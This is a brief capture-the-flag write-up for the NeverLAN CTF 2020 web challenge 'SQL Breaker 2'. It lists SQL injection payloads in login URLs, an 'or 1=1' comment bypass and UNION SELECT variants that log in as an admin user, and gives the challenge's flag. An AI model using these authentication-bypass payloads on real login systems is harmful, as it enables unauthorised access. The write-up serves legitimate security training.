SQL Breaker 2 [Web]
NeverLAN CTF 2020

SQL Breaker 2

(no description)

Recon

https://challenges.neverlanctf.com:1165/login.php?username=x%27%20or%20(1=1)--%20.&password=a

Logs in, but then tells you:

Welcome, John
Profile changes are not available at this time.
Sorry, but only `admin` users can view the flag

When we try:

https://challenges.neverlanctf.com:1165/login.php?username=%27UNION%20SELECT%201,2,3,4,5--%20.&password=a

We are logged in as John.

But when we use: https://challenges.neverlanctf.com:1165/login.php?username=%27UNION%20SELECT%202,3,4,5,6--%20.&password=a

We are logged in as the admin.

../downloads/neverlan2020_bobby.png

Welcome, Bobbyadmin
Profile changes are not available at this time.
but, here's your flag{esc4p3y0ur1nputs}

Flag

flag{esc4p3y0ur1nputs}